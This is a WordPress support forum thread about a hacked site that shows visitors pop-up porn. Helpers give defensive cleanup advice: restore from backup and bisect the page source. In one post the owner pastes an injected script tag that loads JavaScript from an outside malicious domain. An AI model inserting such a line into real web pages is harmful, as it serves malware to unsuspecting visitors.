WordPress.org

Ready to get started?Download WordPress

Forums

Possible Virus? Users are getting a pop-up porn message (11 posts)

  1. vuhoops
    Member
    Posted 2 years ago #

    I think I'm running the most recent version of WP (3.2.1), but folks are complaining of a pop-up porn issue on VUhoops.com.

    And I am completely unable to recreate the issue.

    All issues relating to the topic are 5+ years old. Is there a more recent suggestion that I should look at? Or any suggestions at all?

    Many thanks in advance.

  2. vuhoops
    Member
    Posted 2 years ago #

    Crud, now my site is simply forwarding to http://vuhoops.com/wp-admin/install.php

  3. FittingSites
    Member
    Posted 2 years ago #

    Yes, it's compromised. If you have host access, I'd take it down immediately. Also, test it here. I did, and it shows malware in your javascript.

    Do you have a backup you can restore from? A backup of both the files and the database. It's often easier to "roll the clock back" to a clean copy of your site.

    Also, good idea, for anyone else here, to NOT click on the link above or visit vuhoops.com

  4. vuhoops
    Member
    Posted 2 years ago #

    Thank you Fitting sites. I'm affraid I am way in over my head now. :(

  5. esmi
    Forum Moderator
    Posted 2 years ago #

  6. vuhoops
    Member
    Posted 2 years ago #

    Ok, so I've actually gone w/ a complete new installation and new db. and restored my posts.

    But users are still reporting the issue. Any ideas at this point???

    I hope that my activity from the past few years shows I'm not trying to draw people to my site to spread anything but simply to ask for help at this point.

  7. Sabinou
    Member
    Posted 2 years ago #

    There's a solution, if some of your visitors are nerdy enough to do the test for you, you can find from where the call to the problematic content is coming.

    I wrote this for my blog, I'll copy-paste, just removing the name of my blog :

    - first, open the blog and get the virus warning.

    - then ask your browser to give you the source code of the website.

    - then open your favorite text editor (not Word, a simple text manager, like Notepad or Notepad++ for MS-Winwows OSes), create a new text file, and paste inside it the code source you just obtained

    - save that file as 1.html to a folder on your hard disk

    - to make sure, open 1.html inside your browser : it should open a weird copy of the blog, and also trigger the virus warning

    *** Now we’ll track which part of the source code calls for the virus ! ***

    - with copy, cut and paste, create a new text file with the first half of the code of your 1.html file, and another new file with the second half of the code of 1.html. Save them as 2.html and 3.html

    - Open 2.html in your browser, if it doesn’t trigger the virus warning, then it’s 3.html that should trigger it. If none of them triggers it, hit F5 with each of the pages a few times. You should find which of these two files will trigger the virus warning.

    - And then again, you divide the culprit file in two halves (for instance 2a and 2b.html), and so on, and so on, until you have a very small html file responsible for the virus warning !

    - ideally, that final virus-causing file should contain just a few lines of code, allowing to see precisely what item within the website is calling for a virus attack

  8. vuhoops
    Member
    Posted 2 years ago #

    the XMLPRC is yielding this if it helps...

    XML-RPC server accepts POST requests only.<script src="http://sweepstakesandcontestsinfo.com/js.php?s=1"></script>

  9. FittingSites
    Member
    Posted 2 years ago #

    @vuhoops - The process of restoring from backup is complicated enough to require a fair amount of confidence and expertise, so if you are not technically-minded, don't muck about; have someone help you with this.

    I recommend you contact your hosting provider and asked them to roll you back to a date that is prior to being hacked. Mosts web host will do this for you (they may charge, but it's worth it in this instance) so you don't have to worry about being in over your head.

    Bottom line: You need to fix this ASAP, and if you can't do so right away, take the site down for maintenance. As we speak, your site is causing visitors computers to be open to god know what kinds of attacks.

  10. vuhoops
    Member
    Posted 2 years ago #

    I just wanted to thank everyone for their help and support. I was able to roll the site back, so I think we're better.

    Thanks again.

  11. FittingSites
    Member
    Posted 2 years ago #

    +1

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags